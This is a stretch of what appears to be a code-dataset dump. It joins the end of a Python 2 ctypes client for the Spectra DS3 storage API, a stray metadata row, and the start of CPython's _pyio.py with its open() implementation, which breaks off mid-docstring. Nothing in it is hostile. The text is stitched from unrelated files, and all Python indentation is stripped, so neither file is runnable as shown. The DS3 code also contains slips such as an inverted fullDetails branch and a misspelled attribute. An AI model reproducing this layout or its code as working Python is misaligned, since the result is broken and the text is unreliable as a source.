self.statusCode = None
self.statusMessage = None
self.message = None
if response:
self._hasResponse = True
self.statusCode = response.contents.status_code
self.statusMessage = response.contents.status_message.contents.value
self.message = checkExistence(response.contents.error_body)
libds3.lib.ds3_free_error(libds3Error)
def __str__(self):
errorMessage = "Reason: " + self.reason
if self._hasResponse:
errorMessage += " | StatusCode: " + str(self.statusCode)
errorMessage += " | StatusMessage: " + self.statusMessage
if self.message:
errorMessage += " | Message: " + self.message
return errorMessage
def __repr__(self):
return self.__str__()
class Credentials(object):
def __init__(self, accessKey, secretKey):
self.accessKey = accessKey
self.secretKey = secretKey
class Ds3Bucket(object):
def __init__(self, ds3Bucket):
self.name = ds3Bucket.name.contents.value
self.creationDate = ds3Bucket.creation_date.contents.value
def __str__(self):
return "Name: " + self.name + " | Creation Date: " + self.creationDate
def __repr__(self):
return self.__str__()
class Ds3Owner(object):
def __init__(self, ds3Owner):
ownerContents = ds3Owner.contents
self.name = ownerContents.name.contents.value
self.id = ownerContents.id.contents.value
def __str__(self):
return "Name: " + self.name + " | ID: " + self.id
def __repr__(self):
return self.__str__()
class Ds3Object(object):
def __init__(self, ds3Object):
self.name = ds3Object.name.contents.value
self.etag = checkExistence(ds3Object.etag)
self.size = ds3Object.size
self.owner = Ds3Owner(ds3Object.owner)
def __str__(self):
return "Name: " + self.name + " | Size: " + str(self.size) + " | Etag: " + str(self.etag) + " | Owner: " + str(self.owner)
def __repr__(self):
return self.__str__()
class Ds3BucketDetails(object):
def __init__(self, ds3Bucket):
bucketContents = ds3Bucket.contents
self.name = bucketContents.name.contents.value
self.creationDate = checkExistence(bucketContents.creation_date)
self.isTruncated = bool(bucketContents.is_truncated)
self.marker = checkExistence(bucketContents.marker)
self.delimiter = checkExistence(bucketContents.delimiter)
self.maxKeys = bucketContents.max_keys
self.nextMarker = checkExistence(bucketContents.next_marker)
self.prefix = checkExistence(bucketContents.prefix)
self.commonPrefixes = arrayToList(bucketContents.common_prefixes, bucketContents.num_common_prefixes)
self.objects = arrayToList(bucketContents.objects, bucketContents.num_objects, wrapper = Ds3Object)
class Ds3BulkObject(object):
def __init__(self, bulkObject):
self.name = bulkObject.name.contents.value
self.length = bulkObject.length
self.offset = bulkObject.offset
self.inCache = bool(bulkObject.in_cache)
def __str__(self):
return "Name:" + self.name + " | Length: " + str(self.length) + " | Offset: " + str(self.offset) + " | InCache: " + str(self.inCache)
def __repr__(self):
return self.__str__()
class Ds3CacheList(object):
def __init__(self, bulkObjectList):
contents = bulkObjectList.contents
self.chunkNumber = contents.chunk_number
self.nodeId = checkExistence(contents.node_id)
self.serverId = checkExistence(contents.server_id)
self.chunkId = contents.chunk_id.contents.value
self.objects = arrayToList(contents.list, contents.size, wrapper = Ds3BulkObject)
class Ds3BulkPlan(object):
def __init__(self, ds3BulkResponse):
contents = ds3BulkResponse.contents
self.bucketName = checkExistence(contents.bucket_name)
if contents.cached_size_in_bytes:
self.cachedSize = contents.cached_size_in_bytes
if contents.completed_size_in_bytes:
self.compltedSize = contents.completed_size_in_bytes
self.jobId = checkExistence(contents.job_id)
if contents.original_size_in_bytes:
self.originalSize = contents.original_size_in_bytes
self.startDate = checkExistence(contents.start_date)
self.userId = checkExistence(contents.user_id)
self.userName = checkExistence(contents.user_name)
self.requestType = contents.request_type
self.status = contents.status
self.chunks = arrayToList(contents.list, contents.list_size, wrapper = Ds3CacheList)
def __str__(self):
response = "JobId: " + self.jobId
response += " | Status: " + str(self.status)
response += " | Request Type: " + str(self.requestType)
response += " | BucketName: " + self.bucketName
response += " | UserName: " + self.userName
response += " | Chunks: " + str(self.chunks)
return response
def __repr__(self):
return self.__str__()
class Ds3AllocateChunkResponse(object):
def __init__(self, ds3AllocateChunkResponse):
contents = ds3AllocateChunkResponse.contents
self.retryAfter = contents.retry_after
self.chunk = Ds3CacheList(contents.objects)
class Ds3AvailableChunksResponse(object):
def __init__(self, ds3AvailableChunksResponse):
contents = ds3AvailableChunksResponse.contents
self.retryAfter = contents.retry_after
self.bulkPlan = Ds3BulkPlan(contents.object_list)
class Ds3SearchObject(object):
def __init__(self, ds3SearchObject):
contents = ds3SearchObject.contents
self.bucketId = checkExistence(contents.bucket_id)
self.id = checkExistence(contents.id)
self.name = checkExistence(contents.name)
self.size = contents.size
self.owner = checkExistence(contents.owner, wrapper = Ds3Owner)
self.lastModified = checkExistence(contents.last_modified)
self.storageClass = checkExistence(contents.storage_class)
self.type = checkExistence(contents.type)
self.version = checkExistence(contents.version)
def __str__(self):
response = "BucketId: " + str(self.bucketId)
response += " | Id: " + str(self.id)
response += " | Name: " + str(self.name)
response += " | Size: " + str(self.size)
response += " | Owner: (" + str(self.id) + ")"
response += " | LastModified: " + str(self.lastModified)
response += " | StorageClass: " + str(self.storageClass)
response += " | Type: " + str(self.type)
response += " | Version: " + str(self.version)
return response
class Ds3BuildInformation(object):
def __init__(self, ds3BuildInfo):
contents = ds3BuildInfo.contents
self.branch = checkExistence(contents.branch)
self.revision = checkExistence(contents.revision)
self.version = checkExistence(contents.version)
def __str__(self):
response = "Branch: " + str(self.branch)
response += " | Revision: " + str(self.revision)
response += " | Version: " + str(self.version)
return response
class Ds3SystemInformation(object):
def __init__(self, ds3SystemInfo):
contents = ds3SystemInfo.contents
self.apiVersion = checkExistence(contents.api_version)
self.serialNumber = checkExistence(contents.serial_number)
self.buildInformation = checkExistence(contents.build_information, wrapper = Ds3BuildInformation)
def __str__(self):
response = "API Version: " + str(self.apiVersion)
response += " | Serial Number: " + str(self.serialNumber)
response += " | Build Information: " + str(self.buildInformation)
return response
class Ds3SystemHealthInformation(object):
def __init__(self, ds3HealthInfo):
contents = ds3HealthInfo.contents
self.msRequiredToVerifyDataPlannerHealth = contents.ms_required_to_verify_data_planner_health
def typeCheck(input_arg, type_to_check):
if isinstance(input_arg, type_to_check):
return input_arg
else:
raise TypeError("expected instance of type " + type_to_check.__name__ + ", got instance of type " + type(input_arg).__name__)
def typeCheckString(input_arg):
return typeCheck(input_arg, basestring)
def enumCheck(input_arg, enum_dict):
if input_arg in enum_dict.keys():
return enum_dict[input_arg]
else:
raise TypeError("expected value to be one of " + str(enum_dict.keys()) + ", got " + str(input_arg))
def enumCheckDs3ObjectType(input_arg):
return enumCheck(input_arg, {"DATA":0, "FOLDER":1})
def addMetadataToRequest(request, metadata):
if metadata:
for key in metadata:
if type(metadata[key]) is list or type(metadata[key]) is tuple:
for value in metadata[key]:
libds3.lib.ds3_request_set_metadata(request, key, value);
else:
libds3.lib.ds3_request_set_metadata(request, key, metadata[key]);
def extractMetadataFromResponse(metaData):
result = {}
keys = libds3.lib.ds3_metadata_keys(metaData)
if keys:
for key_index in xrange(0, keys.contents.num_keys):
key = keys.contents.keys[key_index].contents.value
metadataEntry = libds3.lib.ds3_metadata_get_entry(metaData, key)
result[key] = arrayToList(metadataEntry.contents.values, metadataEntry.contents.num_values)
libds3.lib.ds3_free_metadata_entry(metadataEntry)
libds3.lib.ds3_free_metadata_keys(keys)
return result
def createClientFromEnv():
libDs3Client = POINTER(libds3.LibDs3Client)()
error = libds3.lib.ds3_create_client_from_env(byref(libDs3Client))
if error:
raise Ds3Error(error)
clientContents = libDs3Client.contents
clientCreds = clientContents.creds.contents
creds = Credentials(clientCreds.access_id.contents.value, clientCreds.secret_key.contents.value)
proxyValue = checkExistence(clientContents.proxy)
client = Ds3Client(clientContents.endpoint.contents.value, creds, proxyValue)
libds3.lib.ds3_free_creds(clientContents.creds)
libds3.lib.ds3_free_client(libDs3Client)
return client
class Ds3Client(object):
'''
This object is used to communicate with a remote DS3/Spectra S3 endpoint. All communication with the Spectra S3 API is done with this class.
'''
def __init__(self, endpoint, credentials, proxy = None):
self._ds3Creds = libds3.lib.ds3_create_creds(c_char_p(credentials.accessKey), c_char_p(credentials.secretKey))
self._client = libds3.lib.ds3_create_client(c_char_p(endpoint), self._ds3Creds)
self.credentials = credentials
def verifySystemHealth(self):
'''
Returns how long it took to verify the health of the system. In the event that the system is in a bad state, an error will
be thrown.
'''
response = POINTER(libds3.LibDs3VerifySystemHealthResponse)()
request = libds3.lib.ds3_init_verify_system_health()
error = libds3.lib.ds3_verify_system_health(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3SystemHealthInformation(response)
libds3.lib.ds3_free_verify_system_health(response)
return result
def getService(self):
'''
Returns a list of all the buckets the current access id has access to.
'''
response = POINTER(libds3.LibDs3GetServiceResponse)()
request = libds3.lib.ds3_init_get_service()
error = libds3.lib.ds3_get_service(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
contents = response.contents
for i in xrange(0, response.contents.num_buckets):
yield Ds3Bucket(contents.buckets[i])
libds3.lib.ds3_free_service_response(response)
def getBucket(self, bucketName, prefix = None, nextMarker = None, delimiter = None, maxKeys = None):
'''
Returns a list of all the objects in a specific bucket as specified by `bucketName`. This will return at most 1000 objects.
In order to retrieve more, pagination must be used. The `nextMarker` is used to specify where the next 1000 objects will
start listing from.
`delimiter` can be used to list objects like directories. So for example, if delimiter is set to '/' then it will return
a list of 'directories' in the commons prefixes field in the response. In order to list all the files in that directory use the prefix parameter.
For example:
client.getBucket("my_bucket", prefix = 'dir', delimiter = '/')
The above will list any files and directories that are in the 'dir' directory.
'''
response = POINTER(libds3.LibDs3GetBucketResponse)()
request = libds3.lib.ds3_init_get_bucket(typeCheckString(bucketName))
if prefix:
libds3.lib.ds3_request_set_prefix(request, typeCheckString(prefix))
if nextMarker:
libds3.lib.ds3_request_set_marker(request, nextMarker)
if delimiter:
libds3.lib.ds3_request_set_delimiter(request, typeCheckString(delimiter))
if maxKeys:
libds3.lib.ds3_request_set_max_keys(request, maxKeys)
error = libds3.lib.ds3_get_bucket(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bucket = Ds3BucketDetails(response)
libds3.lib.ds3_free_bucket_response(response)
return bucket
def headObject(self, bucketName, objectName):
'''
Returns the metadata for the retrieved object as a dictionary of lists. If the object does not exist
an error is thrown with a status code of 404.
'''
response = POINTER(libds3.LibDs3Metadata)()
request = libds3.lib.ds3_init_head_object(typeCheckString(bucketName), typeCheckString(objectName))
error = libds3.lib.ds3_head_object(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
metadata = extractMetadataFromResponse(response)
libds3.lib.ds3_free_metadata(response)
return metadata
def headBucket(self, bucketName):
'''
Checks whether a bucket exists.
'''
request = libds3.lib.ds3_init_head_bucket(typeCheckString(bucketName))
error = libds3.lib.ds3_head_bucket(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteFolder(self, bucketName, folderName):
'''
Deletes a folder and all the objects contained within it.
'''
request = libds3.lib.ds3_init_delete_folder(typeCheckString(bucketName), typeCheckString(folderName))
error = libds3.lib.ds3_delete_folder(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def getSystemInformation(self):
'''
Returns the version and other information about the Spectra S3 endpoint.
'''
response = POINTER(libds3.LibDs3GetSystemInformationResponse)()
request = libds3.lib.ds3_init_get_system_information()
error = libds3.lib.ds3_get_system_information(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3SystemInformation(response)
libds3.lib.ds3_free_get_system_information(response)
return result
def getObject(self, bucketName, objectName, offset, jobId, realFileName = None):
'''
Gets an object from the Spectra S3 endpoint. Use `realFileName` when the `objectName`
that you are getting from Spectra S3 does not match what will be on the local filesystem.
Returns the metadata for the retrieved object as a dictionary, where keys are
associated with a list of the values for that key.
This can only be used within the context of a Bulk Get Job.
'''
objectName = typeCheckString(objectName)
effectiveFileName = objectName
if realFileName:
effectiveFileName = typeCheckString(realFileName)
response = POINTER(libds3.LibDs3Metadata)()
request = libds3.lib.ds3_init_get_object_for_job(typeCheckString(bucketName), objectName, offset, jobId)
localFile = open(effectiveFileName, "w")
error = libds3.lib.ds3_get_object_with_metadata(self._client, request, byref(c_int(localFile.fileno())), libds3.lib.ds3_write_to_fd, byref(response))
localFile.close()
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
metadata = extractMetadataFromResponse(response)
libds3.lib.ds3_free_metadata(response)
return metadata
def putBucket(self, bucketName):
'''
Creates a new bucket where objects can be stored.
'''
bucketName = typeCheckString(bucketName)
request = libds3.lib.ds3_init_put_bucket(bucketName)
error = libds3.lib.ds3_put_bucket(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def putObject(self, bucketName, objectName, offset, size, jobId, realFileName = None, metadata = None):
'''
Puts an object to the Spectra S3 endpoint. Use `realFileName` when the `objectName`
that you are putting to Spectra S3 does not match what is on the local filesystem.
Use metadata to set the metadata for the object. metadata's value should be
a dictionary, where keys are associated with either a value or a list of the
values for that key.
This can only be used within the context of a Spectra S3 Bulk Put job.
'''
objectName = typeCheckString(objectName)
effectiveFileName = objectName
if realFileName:
effectiveFileName = typeCheckString(realFileName)
request = libds3.lib.ds3_init_put_object_for_job(typeCheckString(bucketName), objectName, offset, size, jobId)
addMetadataToRequest(request, metadata)
localFile = open(effectiveFileName, "r")
error = libds3.lib.ds3_put_object(self._client, request, byref(c_int(localFile.fileno())), libds3.lib.ds3_read_from_fd)
localFile.close()
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteObject(self, bucketName, objName):
'''
Deletes an object from the specified bucket. If deleting several files at once, use `deleteObjects` instead.
'''
request = libds3.lib.ds3_init_delete_object(typeCheckString(bucketName), typeCheckString(objName))
error = libds3.lib.ds3_delete_object(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteObjects(self, bucketName, fileNameList):
'''
Deletes multiple objects from the bucket using a single API call.
'''
bulkObjs = libds3.toDs3BulkObjectList(fileNameList)
request = libds3.lib.ds3_init_delete_objects(typeCheckString(bucketName))
error = libds3.lib.ds3_delete_objects(self._client, request, bulkObjs)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def deleteBucket(self, bucketName):
'''
Deletes a bucket. If the bucket is not empty, then this request will fail. All objects must be deleted first
before the bucket can be deleted.
'''
request = libds3.lib.ds3_init_delete_bucket(typeCheckString(bucketName))
error = libds3.lib.ds3_delete_bucket(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def putBulk(self, bucketName, fileInfoList):
'''
Initiates a start bulk put with the remote Spectra S3 endpoint. The `fileInfoList` is a list of (objectName, size) tuples.
`objectName` does not have to be the actual name on the local file system, but it will be the name that you must
initiate a single object put to later. `size` must reflect the actual size of the file that is being put.
'''
bulkObjs = libds3.lib.ds3_init_bulk_object_list(len(fileInfoList))
bulkObjsList = bulkObjs.contents.list
for i in xrange(0, len(fileInfoList)):
bulkObjsList[i].name = libds3.lib.ds3_str_init(fileInfoList[i][0])
bulkObjsList[i].length = fileInfoList[i][1]
response = POINTER(libds3.LibDs3BulkResponse)()
request = libds3.lib.ds3_init_put_bulk(typeCheckString(bucketName), bulkObjs)
error = libds3.lib.ds3_bulk(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bulkResponse = Ds3BulkPlan(response)
libds3.lib.ds3_free_bulk_response(response)
return bulkResponse
def getBulk(self, bucketName, fileNameList, chunkOrdering = True):
'''
Initiates a start bulk get with the remote Spectra S3 endpoint. All the files that will be retrieved must be specified in
`fileNameList`.
'''
bulkObjs = libds3.toDs3BulkObjectList(fileNameList)
response = POINTER(libds3.LibDs3BulkResponse)()
chunkOrderingValue = libds3.LibDs3ChunkOrdering.IN_ORDER
if not chunkOrdering:
chunkOrderingValue = libds3.LibDs3ChunkOrdering.NONE
request = libds3.lib.ds3_init_get_bulk(typeCheckString(bucketName), bulkObjs, chunkOrderingValue)
error = libds3.lib.ds3_bulk(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bulkResponse = Ds3BulkPlan(response)
libds3.lib.ds3_free_bulk_response(response)
return bulkResponse
def getObjects(self, bucketName = None, creationDate = None, objId = None, name = None, pageLength = None, pageOffset = None, objType = None, version = None):
'''
Returns a list of objects.
'''
# TODO: need to add an example here of what different query strings are supported
request = libds3.lib.ds3_init_get_objects()
response = POINTER(libds3.LibDs3GetObjectsResponse)()
if bucketName:
libds3.lib.ds3_request_set_bucket_name(request, typeCheckString(bucketName))
if creationDate:
libds3.lib.ds3_request_set_creation_date(request, typeCheckString(creationDate))
if objId:
libds3.lib.ds3_request_set_id(request, typeCheckString(objId))
if name:
libds3.lib.ds3_request_set_name(request, typeCheckString(name))
if pageLength:
libds3.lib.ds3_request_set_page_length(request, typeCheckString(str(pageLength)))
if pageOffset:
libds3.lib.ds3_request_set_page_offset(request, typeCheckString(str(pageOffset)))
if objType:
libds3.lib.ds3_request_set_type(request, enumCheckDs3ObjectType(objType))
if version:
libds3.lib.ds3_request_set_version(request, typeCheckString(str(version)))
error = libds3.lib.ds3_get_objects(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = arrayToList(response.contents.objects, response.contents.num_objects, wrapper = Ds3SearchObject)
libds3.lib.ds3_free_objects_response(response)
return result
def allocateChunk(self, chunkId):
'''
*Deprecated* - Allocates a specific chunk to be allocated in cache so that the objects in that chunk can safely be put without a need
to handle 307 redirects.
'''
request = libds3.lib.ds3_init_allocate_chunk(chunkId)
response = POINTER(libds3.LibDs3AllocateChunkResponse)()
error = libds3.lib.ds3_allocate_chunk(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3AllocateChunkResponse(response)
libds3.lib.ds3_free_allocate_chunk_response(response)
return result
def getAvailableChunks(self, jobId):
'''
Returns a list of all chunks in a job that can currently be processed. It will return a subset of all chunks, and it
will return that same set of chunks until all the data in one of the chunks returned has been either completely gotten,
or been completely put.
'''
request = libds3.lib.ds3_init_get_available_chunks(jobId)
response = POINTER(libds3.LibDs3GetAvailableChunksResponse)()
error = libds3.lib.ds3_get_available_chunks(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = Ds3AvailableChunksResponse(response)
libds3.lib.ds3_free_available_chunks_response(response)
return result
def _sendJobRequest(self, func, request):
response = POINTER(libds3.LibDs3BulkResponse)()
error = func(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
bulkResponse = Ds3BulkPlan(response)
libds3.lib.ds3_free_bulk_response(response)
return bulkResponse
def getJob(self, jobId):
'''
Returns information about a job, including all the chunks in the job, as well as the status of the job.
'''
request = libds3.lib.ds3_init_get_job(jobId)
return self._sendJobRequest(libds3.lib.ds3_get_job, request)
def getJobs(self):
'''
Returns a list of all jobs.
'''
request = libds3.lib.ds3_init_get_jobs()
response = POINTER(libds3.LibDs3GetJobsResponse)()
error = libds3.lib.ds3_get_jobs(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
result = []
for index in xrange(0, response.contents.jobs_size):
result.append(Ds3BulkPlan(response.contents.jobs[index]))
libds3.lib.ds3_free_get_jobs_response(response)
return result
def putJob(self, jobId):
'''
Modifies a job to reset the timeout timer for the job.
'''
request = libds3.lib.ds3_init_put_job(jobId)
return self._sendJobRequest(libds3.lib.ds3_put_job, request)
def deleteJob(self, jobId):
'''
Cancels a currently in progress job.
'''
request = libds3.lib.ds3_init_delete_job(jobId)
error = libds3.lib.ds3_delete_job(self._client, request)
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
def getPhysicalPlacement(self, bucketName, fileNameList, fullDetails = False):
'''
Returns where in the Spectra S3 system each file in `fileNameList` is located.
'''
response = POINTER(libds3.LibDs3GetPhysicalPlacementResponse)()
bulkObjs = libds3.toDs3BulkObjectList(fileNameList)
bucketName=typeCheckString(bucketName)
if fullDetails:
request = libds3.lib.ds3_init_get_physical_placement(bucketName, bulkObjs)
else:
request = libds3.lib.ds3_init_get_physical_placement_full_details(bucketName, bulkObjs)
error = libds3.lib.ds3_get_physical_placement(self._client, request, byref(response))
libds3.lib.ds3_free_request(request)
if error:
raise Ds3Error(error)
placements = []
if response:
placements = arrayToList(response.contents.tapes, response.contents.num_tapes, lambda obj: obj.barcode.contents.value)
libds3.lib.ds3_free_get_physical_placement_response(response)
return placements
| apache-2.0 | 667,016,001,873,500,500 | 42.148041 | 162 | 0.642284 | false | 3.809393 | false | false | false |
batermj/algorithm-challenger | code-analysis/programming_anguage/python/source_codes/Python3.8.0/Python-3.8.0/Lib/_pyio.py | 1 | 93037 | """
Python implementation of the io module.
"""
import os
import abc
import codecs
import errno
import stat
import sys
# Import _thread instead of threading to reduce startup cost
from _thread import allocate_lock as Lock
if sys.platform in {'win32', 'cygwin'}:
from msvcrt import setmode as _setmode
else:
_setmode = None
import io
from io import (__all__, SEEK_SET, SEEK_CUR, SEEK_END)
valid_seek_flags = {0, 1, 2} # Hardwired values
if hasattr(os, 'SEEK_HOLE') :
valid_seek_flags.add(os.SEEK_HOLE)
valid_seek_flags.add(os.SEEK_DATA)
# open() uses st_blksize whenever we can
DEFAULT_BUFFER_SIZE = 8 * 1024 # bytes
# NOTE: Base classes defined here are registered with the "official" ABCs
# defined in io.py. We don't use real inheritance though, because we don't want
# to inherit the C implementations.
# Rebind for compatibility
BlockingIOError = BlockingIOError
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
_IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def open(file, mode="r", buffering=-1, encoding=None, errors=None,
newline=None, closefd=True, opener=None):
r"""Open file and return a stream. Raise OSError upon failure.
file is either a text or byte string giving the name (and the path
if the file isn't in the current working directory) of the file to
be opened or an integer file descriptor of the file to be
wrapped. (If a file descriptor is given, it is closed when the
returned I/O object is closed, unless closefd is set to False.)
mode is an optional string that specifies the mode in which the file is
opened. It defaults to 'r' which means open for reading in text mode. Other
common values are 'w' for writing (truncating the file if it already
exists), 'x' for exclusive creation of a new file, and 'a' for appending
(which on some Unix systems, means that all writes append to the end of the
file regardless of the current seek position). In text mode, if encoding is
not specified the encoding used is platform dependent. (For reading and
writing raw bytes use binary mode and leave encoding unspecified.) The
available modes are:
========= ===============================================================
Character Meaning
--------- ---------------------------------------------------------------
'r' open for reading (default)
'w' open for writing, truncating the file first
'x' create a new file and open it for writing
'a' open for writing, appending to the end of the file if it exists
'b' binary mode
't' text mode (default)
'+' open a disk file for updating (reading and writing)
'U' universal newline mode (deprecated)
========= ===============================================================
The default mode is 'rt' (open for reading text). For binary random
access, the mode 'w+b' opens and truncates the file to 0 bytes, while
'r+b' opens the file without truncation. The 'x' mode implies 'w' and
raises an `FileExistsError` if the file already exists.
Python distinguishes between files opened in binary and text modes,
even when the underlying operating system doesn't. Files opened in
binary mode (appending 'b' to the mode argument) return contents as
bytes objects without any decoding. In text mode (the default, or when
't' is appended to the mode argument), the contents of the file are
returned as strings, the bytes having been first decoded using a
platform-dependent encoding or using the specified encoding if given.
'U' mode is deprecated and will raise an exception in future versions
of Python. It has no effect in Python 3. Use newline to control
universal newlines mode.
buffering is an optional integer used to set the buffering policy.
Pass 0 to switch buffering off (only allowed in binary mode), 1 to select
line buffering (only usable in text mode), and an integer > 1 to indicate
the size of a fixed-size chunk buffer. When no buffering argument is
given, the default buffering policy works as follows:
* Binary files are buffered in fixed-size chunks; the size of the buffer
is chosen using a heuristic trying to determine the underlying device's
"block size" and falling back on `io.DEFAULT_BUFFER_SIZE`.
On many systems, the buffer will typically be 4096 or 8192 bytes long.
* "Interactive" text files (files for which isatty() returns True)
use line buffering. Other text files use the policy described above
for binary files.
encoding is the str name of the encoding used to decode or encode the
file. This should only be used in text mode. The default encoding is
platform dependent, but any encoding supported by Python can be
passed. See the codecs module for the list of supported encodings.
errors is an optional string that specifies how encoding errors are to
be handled---this argument should not be used in binary mode. Pass
'strict' to raise a ValueError exception if there is an encoding error
(the default of None has the same effect), or pass 'ignore' to ignore
errors. (Note that ignoring encoding errors can lead to data loss.)
See the documentation for codecs.register for a list of the permitted
encoding error strings.
newline is a string controlling how universal newlines works (it only
applies to text mode). It can be None, '', '\n', '\r', and '\r\n'. It works
as follows:
* On input, if newline is None, universal newlines mode is
enabled. Lines in the input can end in '\n', '\r', or '\r\n', and
these are translated into '\n' before being returned to the
caller. If it is '', universal newline mode is enabled, but line
endings are returned to the caller untranslated. If it has any of
the other legal values, input lines are only terminated by the given
string, and the line ending is returned to the caller untranslated.
* On output, if newline is None, any '\n' characters written are
translated to the system default line separator, os.linesep. If
newline is '', no translation takes place. If newline is any of the
other legal values, any '\n' characters written are translated to
the given string.
closedfd is a bool. If closefd is False, the underlying file descriptor will
be kept open when the file is closed. This does not work when a file name is
given and must be True in that case.
The newly created file is non-inheritable.
A custom opener can be used by passing a callable as *opener*. The
underlying file descriptor for the file object is then obtained by calling
*opener* with (*file*, *flags*). *opener* must return an open file
descriptor (passing os.open as *opener* results in functionality similar to
passing None).
open() returns a file object whose type depends on the mode, and
through which the standard file operations such as reading and writing
are performed. When open() is used to open a file in a text mode ('w',
'r', 'wt', 'rt', etc.), it returns a TextIOWrapper. When used to open
a file in a binary mode, the returned class varies: in read binary
mode, it returns a BufferedReader; in write binary and append binary
modes, it returns a BufferedWriter, and in read/write mode, it returns
a BufferedRandom.
It is also possible to use a string or bytearray as a file for both
reading and writing. For strings StringIO can be used like a file
opened in a text mode, and for bytes a BytesIO can be used like a file
opened in a binary mode.
"""
if not isinstance(file, int):
file = os.fspath(file)
if not isinstance(file, (str, bytes, int)):
raise TypeError("invalid file: %r" % file)
if not isinstance(mode, str):
raise TypeError("invalid mode: %r" % mode)
if not isinstance(buffering, int):
raise TypeError("invalid buffering: %r" % buffering)
if encoding is not None and not isinstance(encoding, str):
raise TypeError("invalid encoding: %r" % encoding)
if errors is not None and not isinstance(errors, str):
raise TypeError("invalid errors: %r" % errors)
modes = set(mode)
if modes - set("axrwb+tU") or len(mode) > len(modes):
raise ValueError("invalid mode: %r" % mode)
creating = "x" in modes
reading = "r" in modes
writing = "w" in modes
appending = "a" in modes
updating = "+" in modes
text = "t" in modes
binary = "b" in modes
if "U" in modes:
if creating or writing or appending or updating:
raise ValueError("mode U cannot be combined with 'x', 'w', 'a', or '+'")
import warnings
warnings.warn("'U' mode is deprecated",
DeprecationWarning, 2)
reading = True
if text and binary:
raise ValueError("can't have text and binary mode at once")
if creating + reading + writing + appending > 1:
raise ValueError("can't have read/write/append mode at once")
if not (creating or reading or writing or appending):
raise ValueError("must have exactly one of read/write/append mode")
if binary and encoding is not None:
raise ValueError("binary mode doesn't take an encoding argument")
if binary and errors is not None:
raise ValueError("binary mode doesn't take an errors argument")
if binary and newline is not None:
raise ValueError("binary mode doesn't take a newline argument")
if binary and buffering == 1:
import warnings
warnings.warn("line buffering (buffering=1) isn't supported in binary "
"mode, the default buffer size will be used",
RuntimeWarning, 2)
raw = FileIO(file,
(creating and "x" or "") +
(reading and "r" or "") +
(writing and "w" or "") +
(appending and "a" or "") +
(updating and "+" or ""),
closefd, opener=opener)
result = raw
try:
line_buffering = False
if buffering == 1 or buffering < 0 and raw.isatty():
buffering = -1
line_buffering = True
if buffering < 0:
buffering = DEFAULT_BUFFER_SIZE
try:
bs = os.fstat(raw.fileno()).st_blksize
except (OSError, AttributeError):
pass
else:
if bs > 1:
buffering = bs
if buffering < 0:
raise ValueError("invalid buffering size")
if buffering == 0:
if binary:
return result
raise ValueError("can't have unbuffered text I/O")
if updating:
buffer = BufferedRandom(raw, buffering)
elif creating or writing or appending:
buffer = BufferedWriter(raw, buffering)
elif reading:
buffer = BufferedReader(raw, buffering)
else:
raise ValueError("unknown mode: %r" % mode)
result = buffer
if binary:
return result
text = TextIOWrapper(buffer, encoding, errors, newline, line_buffering)
result = text
text.mode = mode
return result
except:
result.close()
raise
# Define a default pure-Python implementation for open_code()
# that does not allow hooks. Warn on first use. Defined for tests.
def _open_code_with_warning(path):
"""Opens the provided file with mode ``'rb'``. This function
should be used when the intent is to treat the contents as
executable code.
``path`` should be an absolute path.
When supported by the runtime, this function can be hooked
in order to allow embedders more control over code files.
This functionality is not supported on the current runtime.
"""
import warnings
warnings.warn("_pyio.open_code() may not be using hooks",
RuntimeWarning, 2)
return open(path, "rb")
try:
open_code = io.open_code
except AttributeError:
open_code = _open_code_with_warning
class DocDescriptor:
"""Helper for builtins.open.__doc__
"""
def __get__(self, obj, typ=None):
return (
"open(file, mode='r', buffering=-1, encoding=None, "
"errors=None, newline=None, closefd=True)\n\n" +
open.__doc__)
class OpenWrapper:
"""Wrapper for builtins.open
Trick so that open won't become a bound method when stored
as a class variable (as dbm.dumb does).
See initstdio() in Python/pylifecycle.c.
"""
__doc__ = DocDescriptor()
def __new__(cls, *args, **kwargs):
return open(*args, **kwargs)
# In normal operation, both `UnsupportedOperation`s should be bound to the
# same object.
try:
UnsupportedOperation = io.UnsupportedOperation
except AttributeError:
class UnsupportedOperation(OSError, ValueError):
pass
class IOBase(metaclass=abc.ABCMeta):
"""The abstract base class for all I/O classes, acting on streams of
bytes. There is no public constructor.
This class provides dummy implementations for many methods that
derived classes can override selectively; the default implementations
represent a file that cannot be read, written or seeked.
Even though IOBase does not declare read or write because
their signatures will vary, implementations and clients should
consider those methods part of the interface. Also, implementations
may raise UnsupportedOperation when operations they do not support are
called.
The basic type used for binary data read from or written to a file is
bytes. Other bytes-like objects are accepted as method arguments too.
Text I/O classes work with str data.
Note that calling any method (even inquiries) on a closed stream is
undefined. Implementations may raise OSError in this case.
IOBase (and its subclasses) support the iterator protocol, meaning
